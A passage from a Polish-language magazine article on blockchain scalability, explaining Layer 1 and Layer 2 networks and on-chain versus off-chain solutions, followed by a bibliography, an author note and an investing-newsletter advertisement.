przy jego pomocy „śmierdzą”, chociaż faktycznie w okresach wielkie-
<81>
BLOCKCHAIN

go zainteresowania krypto rośnie liczba oszustw, ale nie jest to wina
technologii, a raczej kwestia związana z ludzką chciwością. Chodzi
o to, że blockchain można potraktować warstwowo. Ja skupię się na
dwóch warstwach, mianowicie na tzw. Warstwie 1 (ang. Layer 1, L1)
oraz Warstwie 2 (ang. Layer 2, L2), ponieważ jeśli chodzi o skalowal-
ność, to obecnie rozwiązania koncentrują się właśnie wokół nich.
L1, najprościej mówiąc, to po prostu blockchain, który służy jako
infrastruktura dla innych protokołów, aplikacji i sieci, które mogą być
zbudowane z jej wykorzystaniem. Główną charakterystyką działania
takiego rozwiązania jest algorytm konsensusu, który został wyko-
rzystany. Typowymi przykładami Layer 1 są np. Bitcoin i Ethereum.
Każda sieć L1 charakteryzuje się również tym, że ma swój natywny
token, w którym pokrywane są chociażby wszystkie opłaty transak-
cyjne. Mianem L2 nazywane są natomiast rozwiązania zbudowane
w oparciu o L1. Oznacza to, że rezultatem może być np. osobna sieć,
która będzie w jakiś sposób połączona z „głównym” blockchainem.
Takimi rozwiązaniami są np. Lightning Network, Polygon czy też
zkSync.
Mówiąc o skalowalności, można spotkać się też z podziałem na
tzw. rozwiązania on-chain i off-chain, gdzie pierwsze z nich odnoszą
się do L1, natomiast drugie do L2. On-chain oznacza, że rozwiązanie
dotyczy rzeczy, które mają związek z samym blockchainem. Nato-
miast off-chain nie świadczy o tym, że nic nie dzieje się na blockcha-
inie, ale mówi o tym, że większośc operacji wykonuje się poza głów-
nym łańcuchem, czyli na poziomie L2, natomiast na L1 wrzucane są
np. tylko potwierdzenia ich wykonania.
PODSUMOWANIE
Wyskalowanie blockchaina to obecnie jedno z najważniejszych wy-
zwań, którym trzeba podołać. Bez rozwiązania tego problemu block-
chain nie będzie w stanie sprostać rosnącej liczbie użytkowników, co
mogłoby być gwoździem do trumny dla tej technologii. Na szczęście
istnieje już przynajmniej kilka ciekawych pomysłów, które mogą po-
móc poradzić sobie z tą niedogodnością. Co więcej, większość z nich
działa już na mniejszą bądź większą skalę, a efekty, jakie są osiągane
przy ich pomocy, pozwalają stwierdzić, że wszystko idzie w jak naj-
lepszym kierunku. W kolejnym artykule zostanie wyjaśnione m.in,
czym jest sharding i czym różni się od sidechainów, jak to możliwe,
że transakcja na Bitcoinie (ale nie tylko) może być prawie darmowa,
oraz dlaczego dowód z wiedzą zerową (ang. Zero Knowledge Proof) to
nie do końca dowód.

Bibliografia
[1] https://chaindebrief.com/cryptocurrency-adoption-curve-is-the-fastest-in-human-history/
[2] https://ourworldindata.org/internet
[3] https://glassnode.com/
[4] https://studio.glassnode.com/metrics?a=BTC&m=addresses.ActiveCount&resolution=1month
[5] https://studio.glassnode.com/metrics?a=ETH&m=addresses.ActiveCount&resolution=1month
[6] https://ipfs.io/
[7] https://bitinfocharts.com/pl/comparison/bitcoin-transactionfees.html#alltime
[8] https://www.blockchain.com/charts/mempool-count
[9] https://etherscan.io/chart/pendingtx
[10] https://txstreet.com/v/eth-btc
[11] https://utilli.com/2021/04/26/the-lightning-network-is-poised-to-disrupt-utility-payments/
[12] https://www.visa.co.uk/dam/VCOM/download/corporate/media/visanet-technology/aboutvisafactsheet.pdf
[13] https://phemex.com/blogs/what-is-transactions-per-second-tps
[14] https://www.bnbchain.world/en/blog/the-journey-so-far-focus-on-scaling/
[15] https://www.gemini.com/cryptopedia/solana-blockchain#section-a-new-blockchain-architecture-proof-of-stake-and-proof-of-history
[16] https://etherscan.io/chart/blocksize
[17] https://ethereum.github.io/yellowpaper/paper.pdf
[18] https://ethereum.org/en/developers/docs/blocks/
[19] https://beaconcha.in/charts
[20] https://www.ethernodes.org/history

PRZEMYSŁAW TREPKA
zblockowani@gmail.com
Pasjonat technologii blockchain oraz rynku kryptowalut. Obecnie pracuje jako Blockchain Developer w ValueLogic.

<82> { 2 / 2022 < 101 > }

JUŻ CHYBA NAJWYŻSZY CZAS
PORZĄDNIE ZAJĄĆ SIĘ TEMATEM
SWOJEJ FINANSOWEJ PRZYSZŁOŚCI,
NIE SĄDZISZ?

dołącz do mailingu ATLASPASYWNEGOINWESTORA.PL →